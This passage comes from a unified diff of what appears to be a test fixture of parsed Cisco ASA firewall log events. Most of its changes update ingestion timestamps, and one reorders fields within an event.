inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604257700Z", + "ingested": "2021-12-14T14:37:05.575503867Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604261500Z", + "ingested": "2021-12-14T14:37:05.575504198Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604265800Z", + "ingested": "2021-12-14T14:37:05.575504528Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604270500Z", + "ingested": "2021-12-14T14:37:05.575504855Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604276700Z", + "ingested": "2021-12-14T14:37:05.575505191Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604280200Z", + "ingested": "2021-12-14T14:37:05.575505532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604284500Z", + "ingested": "2021-12-14T14:37:05.575505889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604289900Z", + "ingested": "2021-12-14T14:37:05.575506224Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604294900Z", + "ingested": "2021-12-14T14:37:05.575506563Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604298500Z", + "ingested": "2021-12-14T14:37:05.575506904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604302700Z", + "ingested": "2021-12-14T14:37:05.575507232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604306300Z", + "ingested": "2021-12-14T14:37:05.575507569Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", @@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604310800Z", + "ingested": "2021-12-14T14:37:05.575507900Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604315900Z", + "ingested": "2021-12-14T14:37:05.575508241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604320300Z", + "ingested": "2021-12-14T14:37:05.575508576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604325700Z", + "ingested": "2021-12-14T14:37:05.575508913Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604331100Z", + "ingested": "2021-12-14T14:37:05.575509267Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604336500Z", + "ingested": "2021-12-14T14:37:05.575509604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604341800Z", + "ingested": "2021-12-14T14:37:05.575509952Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604347600Z", + "ingested": "2021-12-14T14:37:05.575510281Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604353Z", + "ingested": "2021-12-14T14:37:05.575510612Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604358700Z", + "ingested": "2021-12-14T14:37:05.575511091Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604364100Z", + "ingested": "2021-12-14T14:37:05.575512041Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604369400Z", + "ingested": "2021-12-14T14:37:05.575512413Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604374800Z", + "ingested": "2021-12-14T14:37:05.575512756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604380200Z", + "ingested": "2021-12-14T14:37:05.575513090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604385600Z", + "ingested": "2021-12-14T14:37:05.575513417Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604390900Z", + "ingested": "2021-12-14T14:37:05.575513909Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604396300Z", + "ingested": "2021-12-14T14:37:05.575514241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604401900Z", + "ingested": "2021-12-14T14:37:05.575514577Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604405700Z", + "ingested": "2021-12-14T14:37:05.575514914Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604410Z", + "ingested": "2021-12-14T14:37:05.575515323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604414900Z", + "ingested": "2021-12-14T14:37:05.575515686Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604419500Z", + "ingested": "2021-12-14T14:37:05.575516037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604423Z", + "ingested": "2021-12-14T14:37:05.575516374Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604427300Z", + "ingested": "2021-12-14T14:37:05.575516712Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604432700Z", + "ingested": "2021-12-14T14:37:05.575517048Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604438Z", + "ingested": "2021-12-14T14:37:05.575517379Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604441500Z", + "ingested": "2021-12-14T14:37:05.575517707Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604445300Z", + "ingested": "2021-12-14T14:37:05.575518036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604448600Z", + "ingested": "2021-12-14T14:37:05.575518368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604452800Z", + "ingested": "2021-12-14T14:37:05.575518704Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604458200Z", + "ingested": "2021-12-14T14:37:05.575519048Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604463600Z", + "ingested": "2021-12-14T14:37:05.575519398Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604468900Z", + "ingested": "2021-12-14T14:37:05.575519729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604474300Z", + "ingested": "2021-12-14T14:37:05.575520057Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604479600Z", + "ingested": "2021-12-14T14:37:05.575520383Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", @@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604484900Z", + "ingested": "2021-12-14T14:37:05.575520713Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604490400Z", + "ingested": "2021-12-14T14:37:05.575521045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604495800Z", + "ingested": "2021-12-14T14:37:05.575521400Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604501200Z", + "ingested": "2021-12-14T14:37:05.575521733Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604506500Z", + "ingested": "2021-12-14T14:37:05.575522067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", @@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604511800Z", + "ingested": "2021-12-14T14:37:05.575522394Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604517200Z", + "ingested": "2021-12-14T14:37:05.575522743Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604522600Z", + "ingested": "2021-12-14T14:37:05.575523075Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604528Z", + "ingested": "2021-12-14T14:37:05.575523424Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604533300Z", + "ingested": "2021-12-14T14:37:05.575523760Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", @@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604538700Z", + "ingested": "2021-12-14T14:37:05.575524093Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604544200Z", + "ingested": "2021-12-14T14:37:05.575524413Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604548100Z", + "ingested": "2021-12-14T14:37:05.575524745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604552400Z", + "ingested": "2021-12-14T14:37:05.575525072Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604557100Z", + "ingested": "2021-12-14T14:37:05.575525405Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", @@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604561700Z", + "ingested": "2021-12-14T14:37:05.575525751Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:32:20.604565200Z", + "ingested": "2021-12-14T14:37:05.575526081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604569800Z", + "ingested": "2021-12-14T14:37:05.575526416Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604575300Z", + "ingested": "2021-12-14T14:37:05.575526745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604580300Z", + "ingested": "2021-12-14T14:37:05.575527096Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604583800Z", + "ingested": "2021-12-14T14:37:05.575527427Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604588Z", + "ingested": "2021-12-14T14:37:05.575527758Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604591500Z", + "ingested": "2021-12-14T14:37:05.575528092Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", @@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604596200Z", + "ingested": "2021-12-14T14:37:05.575528437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604601500Z", + "ingested": "2021-12-14T14:37:05.575528773Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604605800Z", + "ingested": "2021-12-14T14:37:05.575529109Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - 